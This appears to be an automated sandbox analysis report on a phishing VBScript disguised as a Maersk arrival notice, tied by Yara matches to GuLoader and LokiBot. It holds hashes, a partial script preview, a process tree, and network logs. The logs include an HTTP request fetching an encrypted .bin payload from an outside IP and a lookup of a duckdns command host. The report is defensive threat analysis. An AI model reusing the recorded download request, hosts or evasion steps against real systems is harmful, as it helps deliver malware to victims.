C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fil-PH\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31976
Entropy (8bit):	4.835586304677931
Encrypted:	false
SSDEEP:	384:7rq9iVdy/PySnwF1Xusmk4+n/IrxmK5NJMcWS8/WkRDBRJM+jlGsu0:7raX6S4d4SwrxmCNyVR1PEU
MD5:	DB490CD5090EB998C109D4F6C9F6B914
SHA1:	DB62CE7617D219DD894F4B24FB9DC1CAB87C9B29
SHA-256:	FC43DD264BE0FE99AC8E2D18B740EC0B73561582266D02D83EC1A47B175D4732
SHA-512:	884A3AF2F04E3CA077D3D55552C5A68589687F48841F9EA86DFCC3EE40DCA5F550A75A9130F1B3AF291848C260D8221145D3EAE05E1F52F079BD21A0706F5369
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........Z......................................................s.....@.......................................... ...V...........\... ...........................................................................................rdata..p...........................@..@.rsrc....V... ...X..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..@R...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-CA\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70904
Entropy (8bit):	4.122423830923978
Encrypted:	false
SSDEEP:	768:7r+HN1pfypacBHsn3GMxErz4b78btptrnDD333dUIN7bZIBIrJHI7GYR1PezV:2H/n294b78bBnDD333tYHP8V
MD5:	7449A7FA39DE266A5DA058FA94933C1E
SHA1:	ED33517694BDBD89DEA37EF630D1C10C441FF03C
SHA-256:	E5E4519B6F9EC15AFD5E1C1B8DF028741239B91DE7D0180856D0B51D57E37DE0
SHA-512:	2C89E1908BCBE5A03C5A6C0761318D347A588ED6CF3C062ED6A045942EE25DDABC4A61084D1E04C0CC98DD1A48BD170B4399E0E0551C8B6CA7E26FD3F634799A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................,....@.......................................... ..D................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\fr-CA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31464
Entropy (8bit):	4.915678212733668
Encrypted:	false
SSDEEP:	384:7r7RBpShjacFbZW30+l3FiUmXPfF1B7dNzxnWS8/Wk4RDBRJcs4lGsQcitC:7rg0cFbZW30+d5kXB+aR1Pp5JtC
MD5:	CBF02EF073E0A7E07C4C59C4FBEF8C72
SHA1:	E8D4ACB42B7C56022BB88D6F232F59B3558E050B
SHA-256:	D8E1C88B12FA699ED1444022726AADB2464334CA00D9895EFC45A56864594DC9
SHA-512:	3433CABB73182128F0B89ED3DC2F87A6E862D5288D81C5DE5DDBAF27D2271E1CC2605F503F1FAAA41A005DCBDFC07E20E1C7CB050F2EF8F562DB3ECEF90DB570
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....JVa...........!.........X............................................................@.......................................... ...T...........Z... ...........................................................................................rdata..p...........................@..@.rsrc....T... ...V..................@..@.............JVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...O...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	3.9982283274649064
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
File size:	215177
MD5:	3db65d6cb8c8f1b0e97dfc293d28e295
SHA1:	c3fb70c3613ccdcdac2e4a12df17551ab93a88a4
SHA256:	6394c4e126b8ef4cf8e66d43a54cfd42fd86b3003292f621f0ca427bc12051d8
SHA512:	ad8fbef4974d2ad526d0a1fdd312d6f08faaca87b04e7e096d5af44aba912ab165e6253f587e3a841e6f48041015f2bf4b5f9b849ded66c2b07a712d448b209a
SSDEEP:	1536:iuAsWuLukVVDrwlapE/kowuDrxPQh2QYVGtVNJ8r9PRloka7N+EcSpUJ7hSiiMLT:iNgEgRnYUZ+LSQT+lez
File Content Preview:	Dim objshell, objExec, strLine..set objShell = CreateObject("Wscript.Shell")....Set objExec = objShell.Exec("ipconfig.exe /release")..Do Until objExec.StdOut.AtEndOfStream.. strLine = strLine & objExec.StdOut.ReadLine()..Loop......if InStr(1,strLine ,

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/12/21-04:40:11.434409	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49788	80	192.168.11.20	178.32.63.50
10/12/21-04:40:13.273529	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63817	1.1.1.1	192.168.11.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 04:40:11.416676044 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.433799028 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.434051037 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.434408903 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.504209995 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514601946 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514667988 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514717102 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514764071 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514825106 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.514878035 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.514889002 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.514898062 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532079935 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532145023 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532191992 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532238007 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532283068 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532306910 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532330036 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532357931 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532368898 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532380104 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532387972 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532428026 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532491922 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532531023 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532646894 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549460888 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549542904 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549592018 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549654961 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549659967 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549701929 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549710035 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549766064 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549820900 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549837112 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549860954 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549930096 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549973965 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549978018 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550023079 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550024033 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550071001 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550117016 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550126076 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550162077 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550164938 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550184011 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550194025 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550209999 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550256968 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550302029 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550318956 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550358057 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550424099 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550436020 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567262888 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567397118 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567445040 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567447901 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567492008 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567538023 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567585945 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567598104 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567609072 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567706108 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567703962 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567750931 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.567784071 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567831039 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567877054 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567923069 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.567985058 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568001032 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568032980 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568041086 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568082094 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568128109 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568151951 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568173885 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568190098 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568201065 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568222046 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568268061 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568309069 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568314075 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568348885 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568360090 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568361998 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568408012 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568453074 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568468094 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568497896 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568506956 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568516970 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.568545103 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568592072 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.568638086 CEST	80	49788	178.32.63.50	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 04:40:13.160449028 CEST	63817	53	192.168.11.20	1.1.1.1
Oct 12, 2021 04:40:13.273529053 CEST	53	63817	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 12, 2021 04:40:13.160449028 CEST	192.168.11.20	1.1.1.1	0xd66b	Standard query (0)	septnet.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 12, 2021 04:40:13.273529053 CEST	1.1.1.1	192.168.11.20	0xd66b	No error (0)	septnet.duckdns.org		193.104.197.90	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

178.32.63.50

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49788	178.32.63.50	80	C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Timestamp	kBytes transferred	Direction	Data
Oct 12, 2021 04:40:11.434408903 CEST	6590	OUT	GET /mvbs/Host_hKVPgVgQ234.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 178.32.63.50 Cache-Control: no-cache
Oct 12, 2021 04:40:11.514601946 CEST	6592	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 02:40:11 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Fri, 08 Oct 2021 10:38:20 GMT ETag: "28240-5cdd4fa582ee3" Accept-Ranges: bytes Content-Length: 164416 Content-Type: application/octet-stream Data Raw: de cd ed 55 70 44 e8 e9 15 39 ed 96 9a 4b d5 21 44 02 b7 8c 2c 87 3f ad 25 01 88 fd 3c 25 10 53 0d 78 31 cb 5c ec 2f 65 f6 4f 5e 51 5f 39 fa 2b 32 fc af 68 63 f2 85 d5 45 f5 e7 08 35 51 6f 17 d3 55 26 99 82 40 71 fe 8a 32 cc b2 b9 24 2d 92 e6 b2 c2 ce c8 6f b9 5b 66 dc 72 52 44 75 16 17 49 75 de cb be d9 b1 7b 94 7d d5 a8 9b b4 54 9d 2f f3 50 07 29 20 87 d9 ce ba a2 b6 c8 0c 78 48 e8 39 3b 45 d6 e5 b3 08 9b f4 3d 0c 64 74 ba 6b c4 da 74 7f 9f d8 49 98 a5 79 09 c7 2a c5 67 58 39 a9 7c fa 5e c7 e6 a9 e1 25 3c 77 2f 31 3b 5f 8e e6 72 0d b6 5a db 51 3f 06 47 f8 a6 76 19 4a 08 41 bd 87 eb a3 4d a3 bb 6c 95 69 3f d7 1a 08 02 a3 d5 4a e5 a6 74 f3 7a d8 b3 44 f9 46 7b ff 76 52 7e 81 b9 e7 48 e1 99 57 f0 fe b5 9c 6e 64 d7 19 b7 9c f9 ae 12 09 98 77 ea 20 00 d1 f4 1b 85 4d fe 42 b5 09 53 bb 5a 63 dd a4 53 38 52 2d 1f ff f3 76 c5 92 23 c0 e9 78 83 3f 12 c6 56 ef 7d 83 ce 10 54 67 b6 82 d3 82 b7 d4 75 c5 49 3b 68 5a b8 fc ef c1 18 bd c8 9c b0 55 f8 97 ad 4b a4 dc b5 a1 e2 38 26 8b 42 40 be b6 70 43 01 e2 2c 50 0d db 9e b5 53 e2 70 f5 30 97 34 58 52 ca 59 8a 6f 6e d3 8a 74 41 c3 e5 5f e2 c0 99 ff 75 f0 1a e5 25 83 67 f7 35 59 b9 00 4f 94 fb 84 63 da 11 ba 0f 30 7d af ab 85 ee ce 4f 2a fb ec 91 76 52 06 65 23 91 57 d3 70 fe cf f6 cb 72 87 30 8f 86 ca 92 d7 07 db 19 cf cb 01 41 af 2b b1 6e 7d 0e a3 d0 7f 87 1a 39 17 a4 b7 e1 33 20 66 04 cd a5 81 69 03 17 ce 79 24 3f 78 5a e2 ce 58 b6 f7 ee 7d 10 1f 27 65 aa 02 b4 ed 18 d0 ff 68 c6 0e 0e 46 c8 1d f2 fb 52 5a 63 3b 0c 17 45 7f f1 15 47 aa 0c 9d ae 66 c1 e7 17 06 9a ee 38 f4 bd f5 c0 1d f6 1b 16 bc 78 da a3 3d 1a e2 13 86 b8 6f cc 1c c8 cc 82 c5 d9 7f 71 ac 78 91 9b 3d a5 fb d8 af a8 9e 01 e6 6b 4d 44 c7 51 d8 a8 94 cf 88 d8 e5 22 be f4 b0 52 05 bb d9 e2 49 da d2 90 75 79 88 91 ad c6 55 08 26 27 72 c7 a6 e0 97 a6 45 04 3a 43 93 31 9d 4b 4d a4 16 20 0c 06 9e 90 6b 0d c4 4f 6d a3 89 ad 28 e5 a0 56 40 45 68 ce 13 d3 25 fd 13 fe 7a 52 0b fb c0 ef 83 76 88 c9 2d 4d a0 82 36 fb b6 16 ac d7 14 6c 61 ac d3 64 b1 ca f0 c7 32 0b 3e d0 99 f9 70 ba b1 9f 5d de 30 f4 d9 61 a8 ea 32 5f e8 7e 49 ab 40 9b a8 4b fe c5 a5 78 ee 54 e3 ec 4c 2d 08 45 73 a0 67 06 d3 1c b7 b7 5b 80 03 80 88 45 a7 b3 72 da 4b eb 9d c1 7c 07 d5 fe 36 bd 92 56 22 d1 95 3e 34 66 c6 0d fe 94 c7 0d 35 8b a9 4c d1 85 80 0c 80 60 13 7a da 17 bb 7e 17 a5 de bf 62 53 da 72 65 cc 7f d6 e9 08 1e b2 4c 45 e5 ef 2d c1 44 ac d4 de bb 8c e2 72 e6 4f 55 72 ee 78 67 28 46 ff 8f 75 bc ee bd 58 5f aa 9c 0a e2 7e 98 b8 c5 3e bc d3 51 09 27 90 c0 9e e4 46 9d a5 00 04 99 a4 8c 4e e6 7b 00 92 b1 c1 9d e3 61 db b7 56 eb f7 2e 76 9b bb 1a 69 db 78 e3 7a b5 15 fc 0a a9 92 e4 4b 29 d2 c2 8c 27 56 c2 5e 06 55 39 59 ee 32 50 54 d2 79 cb 8f a7 67 b1 5a 35 3a 57 e0 a6 64 b3 03 79 01 34 e1 99 67 5e d6 ce dc 37 64 85 d9 b5 56 6b f0 8e b9 a9 28 85 c9 b8 5c b1 b9 72 9e 0f b6 99 81 40 71 fe 8e 32 cc b2 46 db 2d 92 5e b2 c2 ce c8 6f b9 5b 26 dc 72 52 44 75 16 17 49 75 de cb be d9 b1 7b 94 7d d5 a8 9b b4 54 9d 2f f3 50 07 29 20 87 d9 ce ba a2 b6 48 0c 78 48 e6 26 81 4b d6 51 ba c5 ba 4c 3c 40 a9 55 ee 03 ad a9 54 0f ed b7 2e ea c4 14 29 a4 4b ab 09 37 4d 89 1e 9f 7e b5 93 c7 c1 4c 52 57 6b 7e 68 7f e3 89 16 68 98 57 d6 5b 1b 06 47 f8 a6 76 19 4a 58 04 bd 87 a7 a2 4a a3 fd 15 5f Data Ascii: UpD9K!D,?%<%Sx1\/eO^Q_9+2hcE5QoU&@q2$-o[frRDuIu{}T/P) xH9;E=dtktIygX9\|^%<w/1;_rZQ?GvJAMli?JtzDF{vR~HWndw MBSZcS8R-v#x?V}TguI;hZUK8&B@pC,PSp04XRYontA_u%g5YOc0}OvRe#Wpr0A+n}93 fiy$?xZX}'ehFRZc;EGf8x=oqx=kMDQ"RIuyU&'rE:C1KM kOm(V@Eh%zRv-M6lad2>p]0a2_~I@KxTL-Esg[ErK\|6V">4f5L`z~bSreLE-DrOUrxg(FuX_~>Q'FN{aV.vixzK)'V^U9Y2PTygZ5:Wdy4g^7dVk(\r@q2F-^o[&rRDuIu{}T/P) HxH&KQL<@UT.)K7M~LRWk~hhW[GvJXJ_

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 1848 Parent PID: 4684

General

Start time:	04:39:23
Start date:	12/10/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'
Imagebase:	0x7ff7abec0000
File size:	170496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	moderate

Analysis Process: ipconfig.exe PID: 5564 Parent PID: 1848

General

Start time:	04:39:23
Start date:	12/10/2021
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig.exe /release
Imagebase:	0x7ff796060000
File size:	35840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: conhost.exe PID: 4460 Parent PID: 5564

General

Start time:	04:39:23
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: AZTEKERNES.exe PID: 3516 Parent PID: 1848

General

Start time:	04:39:27
Start date:	12/10/2021
Path:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Imagebase:	0x400000
File size:	90114 bytes
MD5 hash:	C7778BEEB7B4EE95495E9268EB7DC6A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: ipconfig.exe PID: 312 Parent PID: 1848

General

Start time:	04:39:32
Start date:	12/10/2021
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\ipconfig.exe' /renew
Imagebase:	0x7ff796060000
File size:	35840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: conhost.exe PID: 4740 Parent PID: 312

General

Start time:	04:39:32
Start date:	12/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a8a50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: ieinstal.exe PID: 2332 Parent PID: 3516

General

Start time:	04:39:47
Start date:	12/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Imagebase:	0xbf0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: mpam-25cd2963.exe PID: 6192 Parent PID: 3224

General

Start time:	04:45:22
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe' /q WD
Imagebase:	0x7ff7202d0000
File size:	16224712 bytes
MD5 hash:	BBC0691332F6E1994993322482AD8480
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: MpSigStub.exe PID: 4180 Parent PID: 6192

General

Start time:	04:45:25
Start date:	12/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD
Imagebase:	0x7ff78e7e0000
File size:	803176 bytes
MD5 hash:	01F92DC7A766FF783AE7AF40FD0334FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp, Author: Florian Roth Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, Author: Joe Security Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory 